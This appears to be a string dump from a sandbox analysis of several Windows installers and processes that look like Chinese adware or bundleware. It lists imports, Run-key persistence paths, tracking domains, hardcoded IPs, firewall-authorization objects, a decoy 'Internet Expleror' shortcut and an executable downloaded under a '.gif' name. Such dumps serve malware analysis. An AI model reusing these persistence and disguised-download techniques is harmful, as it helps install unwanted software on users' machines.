    (*.*)|*.*|
    !18,0,0,0,0,0,0,0,134,0,0,5,0,
    #18,0,0,0,700,0,0,0,134,0,0,5,0,
    :%d/%d/%d
    .http://www.fjmjm.com/web/welcome_cn.htm?ver=%s
    :^:1:^:http://www.baidu.com/baidu?word=%us&tn=ichuner_4_pg&ie=utf-8:^:b:^:http://www.baidu.com/s?tn=ichuner_4_pg
    1:^:Google:^:1:^:http://www.google.com.hk/search?client=aff-cs-worldbrowser&forid=1&ie=utf-8&oe=UTF-8&hl=zh-CN&q=%us:^:g:^:http://www.google.com.hk/webhp?client=aff-worldbrowser&ie=utf-8&oe=UTF-8&hl=zh-CN
    (*.png)|*.png|JPEG
    (*.jpg;*.jpeg)|*.jpg;*.jpeg;|
    (*.bmp)|*.bmp|
    http://www.fjmjm.com/cn/skin.htm
    #http://www.fjmjm.com/cn/plugins.htm
    (*.txt;*.text;)|*.txt;*.text;|
    (*.*)|*.*|0
    !http://www.fjmjm.com/cn/index.htm
    (http://www.fjmjm.com/hl/cn/dailytips.ini$http://www.fjmjm.com/web/navierr.htm
    (*.flv*;*.mp*;*.mov*;*.rm*;*.wm?*;*.asf*;*.avi*;*.wav*;*.mid*)
    (*.swf*)
    (*.js*;*.vbs*;*.css*)
    )http://www.fjmjm.com/hl/cn/browsemode.htm
    )http://www.fjmjm.com/hl/cn/rendermode.htm
    %s ...
    : %d%%
    ...*http://www.fjmjm.com/web/web_search_cn.htm
    (*.htm;*.html;)|*.htm;*.html|
    .http://www.baidu.com/index.php?tn=ichuner_2_pg
    2, 4, 1, 9
    Lightning.exe
    
shandian.exe_2548_rwx_3CF78000_00001000:
    

    

    =*2"=*2"=
    
shandian.exe_2548_rwx_3D930000_00001000:
    

    

    .text
    `.data
    .rsrc
    @.reloc
    
sdad.exe_304:
    

    

    .text
    `.rdata
    @.data
    .rsrc
    @.reloc
    vSSSh
    FTPjK
    FtPj;
    C.PjRV
    tGHt.Ht&
    Software\Microsoft\Windows\CurrentVersion\Run
    PopWinParam.xml
    setup.ini
    1.0.0
    20131020010000
    /web/PopWinParam.asp?d=2014419&mainver=%s&popver=%s&xmlver=%s
    %d.%d.%d
    %d:%d
    HKEY_CLASSES_ROOT
    HKEY_CURRENT_USER
    HKEY_LOCAL_MACHINE
    HKEY_USERS
    HKEY_PERFORMANCE_DATA
    HKEY_DYN_DATA
    HKEY_CURRENT_CONFIG
    &#xX;
    %s="%s"
    %s='%s'
    version="%s"
    encoding="%s"
    standalone="%s"
    isShow
    kernel32.dll
    Please contact the application's support team for more information.
    - Attempt to initialize the CRT more than once.
    - CRT not initialized
    - floating point support not loaded
    portuguese-brazilian
    operator
    GetProcessWindowStation
    USER32.DLL
    KERNEL32.dll
    USER32.dll
    GDI32.dll
    RegCloseKey
    RegCreateKeyA
    RegDeleteKeyA
    RegCreateKeyExA
    RegOpenKeyExA
    RegEnumKeyExA
    RegQueryInfoKeyA
    ADVAPI32.dll
    ole32.dll
    OLEAUT32.dll
    SHLWAPI.dll
    COMCTL32.dll
    HttpQueryInfoA
    InternetOpenUrlA
    WININET.dll
    imagehlp.dll
    VERSION.dll
    GetProcessHeap
    GetCPInfo
    GetConsoleOutputCP
    .?AUDWebBrowserEvents2@@
    http://stat.fjmjm.com
    http://www.fjmjm.com
    zcÁ
    %Program Files%\shandian\bin\sdad.exe
    >>>222:::
    :::222@@@
    @@@222:::
    :::222>>>
    4-6}6
    8$8(8,808
    <*=0=4=8=<=
    >!>%>@>}>
    0#0'0 0/0
    1$2(2,2\2`2
    0,080\0|0
    1$1,181\1|1
    nshell.Explorer.2
    ekernel32.dll
    KERNEL32.DLL
    mscoree.dll
    Replace%Select the entire document
    Arrange Icons/Arrange windows so they overlap
    Cascade Windows5Arrange windows as non-overlapping tiles
    Tile Windows5Arrange windows as non-overlapping tiles
    Tile Windows(Split the active window into panes
    1, 0, 0, 1
    mini.exe
    
F30241_s_0523.exe_544:
    

    

    .text
    `.rdata
    @.data
    .ndata
    .rsrc
    @.reloc
    RegDeleteKeyExW
    Kernel32.DLL
    PSAPI.DLL
    %s=%s
    GetWindowsDirectoryW
    KERNEL32.dll
    ExitWindowsEx
    GetAsyncKeyState
    USER32.dll
    GDI32.dll
    SHFileOperationW
    ShellExecuteW
    SHELL32.dll
    RegDeleteKeyW
    RegCloseKey
    RegEnumKeyW
    RegOpenKeyExW
    RegCreateKeyExW
    ADVAPI32.dll
    COMCTL32.dll
    ole32.dll
    VERSION.dll
    niY.xF
    P}<
    ;SS.Rf
    >7Z%f,*^
    1.kF`_
    5%u}u
    |.hBDSDj
    h.rdata
    H.data
    B.reloc
    SSSSh
    ^LM
    ...wPPP
    G%sR1
    *@.Xw
    CCC.EEE
    Nullsoft Install System v2.46.5-Unicode
    logging set to %d
    settings logging to %d
    created uninstaller: %d, "%s"
    WriteReg: error creating key "%s\%s"
    WriteReg: error writing into "%s\%s" "%s"
    WriteRegBin: "%s\%s" "%s"="%s"
    WriteRegDWORD: "%s\%s" "%s"="0xx"
    WriteRegExpandStr: "%s\%s" "%s"="%s"
    WriteRegStr: "%s\%s" "%s"="%s"
    DeleteRegKey: "%s\%s"
    DeleteRegValue: "%s\%s" "%s"
    WriteINIStr: wrote [%s] %s=%s in %s
    CopyFiles "%s"->"%s"
    CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
    Error registering DLL: Could not load %s
    Error registering DLL: %s not found in %s
    GetTTFFontName(%s) returned %s
    GetTTFVersionString(%s) returned %s
    Exec: failed createprocess ("%s")
    Exec: success ("%s")
    Exec: command="%s"
    ExecShell: success ("%s": file:"%s" params:"%s")
    ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
    Exch: stack < %d elements
    RMDir: "%s"
    MessageBox: %d,"%s"
    Delete: "%s"
    File: wrote %d to "%s"
    File: skipped: "%s" (overwriteflag=%d)
    File: error creating "%s"
    File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"
    Rename failed: %s
    Rename on reboot: %s
    Rename: %s
    IfFileExists: file "%s" does not exist, jumping %d
    IfFileExists: file "%s" exists, jumping %d
    CreateDirectory: "%s" created
    CreateDirectory: can't create "%s" - a file already exists
    CreateDirectory: can't create "%s" (err=%d)
    CreateDirectory: "%s" (%d)
    SetFileAttributes: "%s":X
    Sleep(%d)
    detailprint: %s
    Call: %d
    Aborting: "%s"
    Jump: %d
    verifying installer: %d%%
    unpacking data: %d%%
    ... %d%%
    http://nsis.sf.net/NSIS_Error
    ~nsu.tmp
    install.log
    %u.%u%s%s
    Skipping section: "%s"
    Section: "%s"
    New install of "%s" to "%s"
    .DEFAULT\Control Panel\International
    Software\Microsoft\Windows\CurrentVersion
    *?|<>/":
    invalid registry key
    HKEY_DYN_DATA
    HKEY_CURRENT_CONFIG
    HKEY_PERFORMANCE_DATA
    HKEY_USERS
    HKEY_LOCAL_MACHINE
    HKEY_CURRENT_USER
    HKEY_CLASSES_ROOT
    x%c
    RMDir: RemoveDirectory failed("%s")
    RMDir: RemoveDirectory on Reboot("%s")
    RMDir: RemoveDirectory("%s")
    RMDir: RemoveDirectory invalid input("%s")
    Delete: DeleteFile failed("%s")
    Delete: DeleteFile on Reboot("%s")
    Delete: DeleteFile("%s")
    %s: failed opening file "%s"
    "%Program Files%\Baidu\BaiduSd\1.8.0.1255\BaiduSd.exe" -mod=BDCooly.dll -install
    80.CRT.manifest
    .manifest
    C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nspB6.tmp\KVInstallHelper.dll
    B42A-24B8D3514ABA}\iexplore\AllowedDomains\*
    C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nspB6.tmp
    5\BaiduSd.exe
    aiduSDDetectPlug.dll
    ystem v2.46.5-Unicode
    : "%Program Files%\Baidu\BaiduSd\1.8.0.1255\BaiduSd.exe" -mod=BDCooly.dll -install
    %Program Files%\
    %Program Files%\Baidu\BaiduSd\1.8.0.1255\BDDownloader.exe
    BDDownloader.exe
    ig.xml
    BDDOWN~1.EXE
    Exec: success (""%Program Files%\Baidu\BaiduSd\1.8.0.1255\BaiduSd.exe" -mod=BDCooly.dll -install")
    Helper.dll"
    \1.8.0.1255\BaiduSd.exe ", icon: ,2, sw=1, hk=0
    rogram Files\Baidu\BaiduSd\1.8.0.1255\BaiduSd.exe" -mod=BDCooly.dll -install
    %Program Files%\Baidu\BaiduSd\install.log
    1.28 0110
    \LOCALS~1\Temp\nslB3.tmp\config.ini\..\F30241_s_0523.exe"
    11.28 0110
    "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nslB3.tmp\config.ini\..\F30241_s_0523.exe"
    %Program Files%\Baidu\BaiduSd\1.8.0.1255
    %Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config
    .VC80.CRT
    C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nslB3.tmp
    F30241_s_0523.exe
    CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsfB4.tmp
    C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
    C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nslB3.tmp\F30241_s_0523.exe
    %Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmsysrepair\Microsoft.VC80.CRT
    1963590663
    %Documents and Settings%\All Users\Desktop
    %Documents and Settings%\All Users\Start Menu\Programs
    %Program Files%\Baidu\BaiduSd
    %Documents and Settings%\All Users
    %Documents and Settings%\All Users\Application Data
    1.8.0.1255
    
ionrkf_70688.exe_280:
    

    

    .text
    `.rdata
    @.data
    .ndata
    .rsrc
    @.reloc
    RegDeleteKeyExW
    Kernel32.DLL
    PSAPI.DLL
    %s=%s
    GetWindowsDirectoryW
    KERNEL32.dll
    ExitWindowsEx
    GetAsyncKeyState
    USER32.dll
    GDI32.dll
    SHFileOperationW
    ShellExecuteW
    SHELL32.dll
    RegDeleteKeyW
    RegCloseKey
    RegEnumKeyW
    RegOpenKeyExW
    RegCreateKeyExW
    ADVAPI32.dll
    COMCTL32.dll
    ole32.dll
    VERSION.dll
    .oenmN
    ^bb.fs~3
    4@556 8%8 8
    1%2-42484
    5&6 6=6^7
    0(0,0004080<0
    ; ;<;@;`;
    < <@<\<`<
    Thawte Certification1
    http://ocsp.thawte.com0
    .http://crl.thawte.com/ThawteTimestampingCA.crl0
    http://ts-ocsp.ws.symantec.com07
     http://ts-aia.ws.symantec.com/tss-ca-g2.cer0<
     http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
    .Class 3 Public Primary Certification Authority0
    http://crl.verisign.com/pca3.crl0
    https://www.verisign.com/cps0
    #http://logo.verisign.com/vslogo.gif04
    http://ocsp.verisign.com0>
    Dhttp://crl.microsoft.com/pki/crl/products/MicrosoftCodeVerifRoot.crl0
    n.aAHu
    2Terms of use at https://www.verisign.com/rpa (c)101.0,
    2Beijing baidu Netcom science and technology co.ltd1>0<
    2Beijing baidu Netcom science and technology co.ltd0
    /http://csc3-2010-crl.verisign.com/CSC3-2010.crl0D
    https://www.verisign.com/rpa0
    http://ocsp.verisign.com0;
    /http://csc3-2010-aia.verisign.com/CSC3-2010.cer0
    https://www.verisign.com/cps0*
    #http://crl.verisign.com/pca3-g5.crl04
    http://ocsp.verisign.com0
    BBB.DDD
    Nullsoft Install System v2.46.5-Unicode
    logging set to %d
    settings logging to %d
    created uninstaller: %d, "%s"
    WriteReg: error creating key "%s\%s"
    WriteReg: error writing into "%s\%s" "%s"
    WriteRegBin: "%s\%s" "%s"="%s"
    WriteRegDWORD: "%s\%s" "%s"="0xx"
    WriteRegExpandStr: "%s\%s" "%s"="%s"
    WriteRegStr: "%s\%s" "%s"="%s"
    DeleteRegKey: "%s\%s"
    DeleteRegValue: "%s\%s" "%s"
    WriteINIStr: wrote [%s] %s=%s in %s
    CopyFiles "%s"->"%s"
    CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
    Error registering DLL: Could not load %s
    Error registering DLL: %s not found in %s
    GetTTFFontName(%s) returned %s
    GetTTFVersionString(%s) returned %s
    Exec: failed createprocess ("%s")
    Exec: success ("%s")
    Exec: command="%s"
    ExecShell: success ("%s": file:"%s" params:"%s")
    ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
    Exch: stack < %d elements
    RMDir: "%s"
    MessageBox: %d,"%s"
    Delete: "%s"
    File: wrote %d to "%s"
    File: skipped: "%s" (overwriteflag=%d)
    File: error creating "%s"
    File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"
    Rename failed: %s
    Rename on reboot: %s
    Rename: %s
    IfFileExists: file "%s" does not exist, jumping %d
    IfFileExists: file "%s" exists, jumping %d
    CreateDirectory: "%s" created
    CreateDirectory: can't create "%s" - a file already exists
    CreateDirectory: can't create "%s" (err=%d)
    CreateDirectory: "%s" (%d)
    SetFileAttributes: "%s":X
    Sleep(%d)
    detailprint: %s
    Call: %d
    Aborting: "%s"
    Jump: %d
    verifying installer: %d%%
    unpacking data: %d%%
    ... %d%%
    http://nsis.sf.net/NSIS_Error
    ~nsu.tmp
    install.log
    %u.%u%s%s
    Skipping section: "%s"
    Section: "%s"
    New install of "%s" to "%s"
    .DEFAULT\Control Panel\International
    Software\Microsoft\Windows\CurrentVersion
    *?|<>/":
    invalid registry key
    HKEY_DYN_DATA
    HKEY_CURRENT_CONFIG
    HKEY_PERFORMANCE_DATA
    HKEY_USERS
    HKEY_LOCAL_MACHINE
    HKEY_CURRENT_USER
    HKEY_CLASSES_ROOT
    x%c
    RMDir: RemoveDirectory failed("%s")
    RMDir: RemoveDirectory on Reboot("%s")
    RMDir: RemoveDirectory("%s")
    RMDir: RemoveDirectory invalid input("%s")
    Delete: DeleteFile failed("%s")
    Delete: DeleteFile on Reboot("%s")
    Delete: DeleteFile("%s")
    %s: failed opening file "%s"
    LOCALS~1\Temp\nsgB9.tmp\tmplrr89e.dll
    \ionrkf_70688.exe"
    C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsgB9.tmp\tmplrr89e.dll
    C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsgB9.tmp
    \config.ini\..\ionrkf_70688.exe"
    Nullsoft Install System v2.46.5-Unicode
    1.0.0.379
    %Program Files%\Baidu\
    sgB9.tmp
    File: skipped: "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsgB9.tmp\tmplrr89e.dll" (overwriteflag=1)
    p\tmplrr89e.dll"
    :\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nslB3.tmp\config.ini\..\ionrkf_70688.exe"
    "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nslB3.tmp\config.ini\..\ionrkf_70688.exe"
    %Program Files%\Baidu\BaiduAn
    C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nslB3.tmp
    ionrkf_70688.exe
    CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsbB7.tmp
    C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
    C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nslB3.tmp\ionrkf_70688.exe
    118097215
    1.0.699.299
    
dudu_b_55045.exe_668:
    

    

    .text
    `.rdata
    @.data
    .rsrc
    F=,%D
    F%D,3
    MFC42.DLL
    MSVCRT.dll
    _acmdln
    WinExec
    KERNEL32.dll
    USER32.dll
    RegCloseKey
    RegCreateKeyExA
    RegEnumKeyExA
    RegOpenKeyExA
    RegCreateKeyA
    ADVAPI32.dll
    SHELL32.dll
    ole32.dll
    OLEAUT32.dll
    MSVCP60.dll
    GdipSetImageAttributesColorKeys
    gdiplus.dll
    NETAPI32.dll
    IMAGEHLP.dll
    WS2_32.dll
    VERSION.dll
    MSIMG32.dll
    GDI32.dll
    COMCTL32.dll
    LZMA.dll
    _Key_End_
    _Key_Data_
    _Key_Begin_
    Location: %s
    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.57 Safari/537.17 SE 2.X MetaSr 1.0
    HTTP/1.1
    http://
    kernel32.dll
    %s\%s
    Software\Microsoft\Windows\CurrentVersion\Run
    SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall
    SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
    .PAVCInternetException@@
    Range: bytes=%d-%d
    Range: bytes=%d-
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt; DTS Agent;)
    Referer: %s
    http://www.wallba.com/
    Host: %s
    GET %s HTTP/1.1
    %s %d
    %d,%d,%d,%d,%d,%d
    \SystemConfig\setting.ini
    MsgBox_1.ini
    %s?id=%s&class=silence
    VersionConfig.xml
    version.ini
    \softset.ini
    softset.ini
    http://www.wallba.com/
    URLInfoAbout
    uninstall.exe
    Kpclick.ini
    http://img.wallba.com/Public/caijiansuoluetu/2013nian/8yue/0808fj.jpg
    http://img.wallba.com/Public/caijiansuoluetu/2013nian/8yue/0809kt.jpg
    http://img.wallba.com/Public/caijiansuoluetu/2013nian/8yue/0808kt.jpg
    http://config.wallba.com/Public/Configs/KpInstall/AnImg.xml
    http://tj.153624.com/report/
    skinConfig\TongJICNZZ.dll
    http://config.153624.com/Public/conf/c-lock/1/%s_%s/%s.xml
    http://img.wallba.com/Public/Configs/uninstall_end.html
    http://img.wallba.com/Public/Configs/uninstall_begin.html
    http://img.kuping.cc/Public/Configs/v5_install_close.html
    http://img.wallba.com/Public/Configs/index.html
    http://img.wallba.com/Public/Configs/index2.html
    http://img.wallba.com/Public/Configs/install_end.html
    http://img.wallba.com/Public/Configs/install_begin.html
    /index.php
    XML_URL_TP
    v5.tongji.wallba.com
    downURL
    http://down.shuyeer.net/kptoolbar/kptoolbar_b_50.exe
    KPToolBarSilence.exe
    UniversalMini.exe
    KP4Mini.exe
    Kp_BootClr.exe
    soft.exe
    installedSoftInfo.ini
    .kptheme
    .kpscr
    .kplgui
    .kpicon
    .kpcur
    .kprar
    %s\%s,%d
    %s\KpInstallTheme.exe
    %s %%1
    %s\Shell\Open\Command
    %s\Shell
    %s\DefaultIcon
    http://int.dpool.sina.com.cn/iplookup/iplookup.php
    QueryInterface failed! ctrl: %d
    Can't find the ctrl: %d
    skinconfig.ini
    0900936iso-ir-581028598iso_8859-81201255iso_8859-8-i1200932cswindows31j
    0628597greek81201258windows-1258
    1201257windows-12570738598logical
    1201256windows-12560651932euc-jp
    1201255windows-1255
    2701143x-ebcdic-finlandsweden-euro1201254windows-1254
    0801251x-cp12511201253windows-12531400949ks_c_5601_19871528599iso_8859-9:1989
    0801250x-cp12501201252windows-1252
    1201251windows-12511528598iso_8859-8:1988
    1201250windows-12502301149x-ebcdic-icelandic-euro
    1150220iso-2022-jp1100874windows-874
    1901145x-ebcdic-spain-euro1620127iso_646.irv:1991
    0551932x-euc1250221_iso-2022-jp1000932csshiftjis
    http-equiv
    <>=\/?!"';
    (%d nulls removed)
    length %d
    to length %d
    to %d bytes
    CWebBrowser2
    colorkey
    isshow
    layer_%d
    dddddd
    walla.com,
    @.reloc
    GetProcessWindowStation
    GetCPInfo
    <*=0=4=8=<=
    <(<(=-=?=
    mscoree.dll
    - Attempt to initialize the CRT more than once.
    - CRT not initialized
    - floating point support not loaded
    KERNEL32.DLL
    WUSER32.DLL
    {8856F961-340A-11D0-A96B-00C04FD705A2}
    (*.*)
    1.1.1,1
    InStaller.EXE
    
pczh_98_2.exe_3228:
    

    

    .text
    `.rdata
    @.data
    .ndata
    .rsrc
    uDSSh
    .DEFAULT\Control Panel\International
    Software\Microsoft\Windows\CurrentVersion
    GetWindowsDirectoryA
    KERNEL32.dll
    ExitWindowsEx
    USER32.dll
    GDI32.dll
    SHFileOperationA
    ShellExecuteA
    SHELL32.dll
    RegEnumKeyA
    RegCreateKeyExA
    RegCloseKey
    RegDeleteKeyA
    RegOpenKeyExA
    ADVAPI32.dll
    COMCTL32.dll
    ole32.dll
    VERSION.dll
    verifying installer: %d%%
    unpacking data: %d%%
    ... %d%%
    http://nsis.sf.net/NSIS_Error
    ~nsu.tmp
    callback%d
    %u.%u%s%s
    RegDeleteKeyExA
    %s=%s
    *?|<>/":
    \LOCALS~1\Temp\nsfBF.tmp\NSISdl.dll
    a\123\hao123.ico
    0=http://down.laochehe.com/0619/pjyy_89_1.gif
    0=pjyy_89_1.exe
    C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsfBF.tmp\NSISdl.dll
    top\Internet Expleror.lnk
    C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsfBF.tmp
    2920146065436\YYM_955WD30.gif
    t Expleror.lnk
    ;";2;8;|;"<
    4"4&4*4.42464:4
    GetCPInfo
    Math.dll
    %%.%dg
    %%.Þ
    %%.Þ
    %%.ß
    zcÁ
    3.373]3|3
    %4u~3\
    webL
    4>b_%f
    %c?ux
    h%x/4
    %Documents and Settings%\All Users\Desktop\*Hao123*.*
    YYM_955WD30.gif
    \LOCALS~1\Temp\nsfBF.tmp
    20381719
    2.exe
    17956864
    17956880
    1666368
    1711792
    "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nslB3.tmp\config.ini\..\pczh_98_2.exe"
    %Program Files%\ainqngz3.9
    %Program Files%
    C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nslB3.tmp
    pczh_98_2.exe
    CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nskBD.tmp
    C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
    C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nslB3.tmp\pczh_98_2.exe
    2920146
    2920146065436
    http://update.aiqingzhihui.com/0403/help1.html
    http://www.hao123.com/?tn=97431923_hao_pg
    %Documents and Settings%\%current user%\Templates\2920146065436\YYM_955WD30.gif
    98_2.exe
    http://down.laochehe.com/0619/pjyy_89_1.gif
    pjyy_89_1.exe
    20381696
    83951616
    Nullsoft Install System v2.46
    %Documents and Settings%\All Users\Desktop\Internet Expleror.lnk
    
pczh_98_2.exe_3228_rwx_10004000_00001000:
    

    

    callback%d
    
BaiduSd.exe_1268:
    

    

    .text
    `.rdata
    @.data
    .rsrc
    @.reloc
    c:\clientci\workspace\bdkv_v1.8_patch_compile\basic\KVOutput\binrelease\BaiduSd.pdb
    GetProcessHeap
    KERNEL32.dll
    SHELL32.dll
    MSVCR80.dll
    _amsg_exit
    _wcmdln
    _crt_debugger_hook
    SHLWAPI.dll
    BDKVMainframe.dll
    BDCooly.dll
    1.8.0.1250
    Baidusd.exe
    
Mnyig.exe_2024:
    

    

    .text
    `.itext
    `.data
    .idata
    .rdata
    @.reloc
    B.rsrc
    kernel32.dll
    Windows
    MSWHEEL_ROLLMSG
    MSH_WHEELSUPPORT_MSG
    MSH_SCROLL_LINES_MSG
    $*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
    oleaut32.dll
    EVariantBadIndexError
    ssShift
    htKeyword
    EInvalidOperation
    %s[%d]
    %s_%d
    Uh.FB
    USER32.DLL
    comctl32.dll
    EInvalidGraphicOperation
    SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes
    uxtheme.dll
    DWMAPI.DLL
    UrlMon
    shell32.dll
    PasswordChar
    OnKeyDown
    OnKeyPress8
    OnKeyUp
    clWebSnow
    clWebFloralWhite
    clWebLavenderBlush
    clWebOldLace
    clWebIvory
    clWebCornSilk
    clWebBeige
    clWebAntiqueWhite
    clWebWheat
    clWebAliceBlue
    clWebGhostWhite
    clWebLavender
    clWebSeashell
    clWebLightYellow
    clWebPapayaWhip
    clWebNavajoWhite
    clWebMoccasin
    clWebBurlywood
    clWebAzure
    clWebMintcream
    clWebHoneydew
    clWebLinen
    clWebLemonChiffon
    clWebBlanchedAlmond
    clWebBisque
    clWebPeachPuff
    clWebTan
    clWebYellow
    clWebDarkOrange
    clWebRed
    clWebDarkRed
    clWebMaroon
    clWebIndianRed
    clWebSalmon
    clWebCoral
    clWebGold
    clWebTomato
    clWebCrimson
    clWebBrown
    clWebChocolate
    clWebSandyBrown
    clWebLightSalmon
    clWebLightCoral
    clWebOrange
    clWebOrangeRed
    clWebFirebrick
    clWebSaddleBrown
    clWebSienna
    clWebPeru
    clWebDarkSalmon
    clWebRosyBrown
    clWebPaleGoldenrod
    clWebLightGoldenrodYellow
    clWebOlive
    clWebForestGreen
    clWebGreenYellow
    clWebChartreuse
    clWebLightGreen
    clWebAquamarine
    clWebSeaGreen
    clWebGoldenRod
    clWebKhaki
    clWebOliveDrab
    clWebGreen
    clWebYellowGreen
    clWebLawnGreen
    clWebPaleGreen
    clWebMediumAquamarine
    clWebMediumSeaGreen
    clWebDarkGoldenRod
    clWebDarkKhaki
    clWebDarkOliveGreen
    clWebDarkgreen
    clWebLimeGreen
    clWebLime
    clWebSpringGreen
    clWebMediumSpringGreen
    clWebDarkSeaGreen
    clWebLightSeaGreen
    clWebPaleTurquoise
    clWebLightCyan
    clWebLightBlue
    clWebLightSkyBlue
    clWebCornFlowerBlue
    clWebDarkBlue
    clWebIndigo
    clWebMediumTurquoise
    clWebTurquoise
    clWebCyan
    clWebPowderBlue
    clWebSkyBlue
    clWebRoyalBlue
    clWebMediumBlue
    clWebMidnightBlue
    clWebDarkTurquoise
    clWebCadetBlue
    clWebDarkCyan
    clWebTeal
    clWebDeepskyBlue
    clWebDodgerBlue
    clWebBlue
    clWebNavy
    clWebDarkViolet
    clWebDarkOrchid
    clWebMagenta
    clWebDarkMagenta
    clWebMediumVioletRed
    clWebPaleVioletRed
    clWebBlueViolet
    clWebMediumOrchid
    clWebMediumPurple
    clWebPurple
    clWebDeepPink
    clWebLightPink
    clWebViolet
    clWebOrchid
    clWebPlum
    clWebThistle
    clWebHotPink
    clWebPink
    clWebLightSteelBlue
    clWebMediumSlateBlue
    clWebLightSlateGray
    clWebWhite
    clWebLightgrey
    clWebGray
    clWebSteelBlue
    clWebSlateBlue
    clWebSlateGray
    clWebWhiteSmoke
    clWebSilver
    clWebDimGray
    clWebMistyRose
    clWebDarkSlateBlue
    clWebDarkSlategray
    clWebGainsboro
    clWebDarkGray
    clWebBlack
    Proportional
    OnExecute
    {43826d1e-e718-42ee-bc55-a1e261c37bfe}
    AutoHotkeys
    \SYSTEM\CurrentControlSet\Control\Keyboard Layouts\
    TKeyEvent
    TKeyPressEvent
    HelpKeyword|
    crSQLWait
    %s (%s)
    imm32.dll
    TActiond%F
    HelpKeyword
    ssHotTrack
    TWindowState
    poProportional
    TWMKey
    KeyPreview
    WindowState
    tagMSG
    GlassFrame.Bottom
    GlassFrame.Enabled
    GlassFrame.Left
    GlassFrame.Right
    GlassFrame.SheetOfGlass
    GlassFrame.Top
    System\CurrentControlSet\Control\Keyboard Layouts\%.8x
    User32.dll
    %s, ClassID: %s
    %s, ProgID: "%s"
    ole32.dll
    CoXMLHTTPRequest
    olepro32.dll
    %d.%d.%d.%d
    ftp://
    login error
    http://
    Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
    HTTP/1.1
    grfKeyState
    TComTargetExecEvent
    CmdGroup
    nCmdID
    nCmdexecopt
    hhctrl.ocx
    URLMON.DLL
    SHDOCLC.DLL
    IWebBrowser
    IWebBrowserApp
    IWebBrowser2
    TEWBWindowSetResizable
    TEWBWindowSetLeft
    TEWBWindowSetTop
    TEWBWindowSetWidth
    TEWBWindowSetHeight
    bstrUrlContext
    bstrUrl
    OnWindowSetResizable<
    OnWindowSetLeft
    OnWindowSetTop
    OnWindowSetWidth
    OnWindowSetHeightL
    EWebBrokerExceptionU
    PSAPI.dll
    TAsyncExecuteThreadU
    SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Down\ETagFile.dat
    HNetCfg.FwMgr
    HNetCfg.FwAuthorizedApplication
    %d.%d
    Shell.Application
    Shell32.dll
    SysShadow
    Content-Type: application/x-www-form-urlencoded
    var x = document.createElement("link");x.rel = "stylesheet";x.type = "text/css";x.media = "screen";x.href = "
    document.getElementsByTagName("head")[0].appendChild(x);
    scrollbar.css
    TSimpleUdpClient
    D:\project\Component\superobjectv1.2.4\superobject.pas
    Unsuported variant data type: %d
    STcpThread
    tjj.mny8.cn
    tjjwt.mny8.cn
    tjjdx.mny8.cn
    tjjt.mny8.cn
    125.43.78.107
    tjj.mnyb.net
    222.88.93.109
    IWebBrowserApp,"I
    IWebBrowser2`"I
    TWebBrowserStatusTextChange
    TWebBrowserProgressChange
    TWebBrowserCommandStateChange
    TWebBrowserTitleChange
    TWebBrowserPropertyChange
    TWebBrowserBeforeNavigate2
    TWebBrowserNewWindow2
    TWebBrowserNavigateComplete2
    TWebBrowserDocumentComplete
    TWebBrowserOnVisible
    TWebBrowserOnToolBar
    TWebBrowserOnMenuBar
    TWebBrowserOnStatusBar
    TWebBrowserOnFullScreen
    TWebBrowserOnTheaterMode
    TWebBrowserWindowSetResizable
    TWebBrowserWindowSetLeft
    TWebBrowserWindowSetTop
    TWebBrowserWindowSetWidth
    TWebBrowserWindowSetHeight
    TWebBrowserWindowClosing
    TWebBrowserClientToHostWindow
    TWebBrowserSetSecureLockIcon
    TWebBrowserFileDownload
    TWebBrowserNavigateError
    %TWebBrowserPrintTemplateInstantiation
    TWebBrowserPrintTemplateTeardown
    TWebBrowserUpdatePageStatus
    %TWebBrowserPrivacyImpactedStateChange
    TWebBrowser
    OnWindowSetResizable
    OnWindowSetTop<)I
    OnWindowSetHeight
    HKEY_LOCAL_MACHINE
    HKEY_CURRENT_USER
    ou.mny8.com.cn
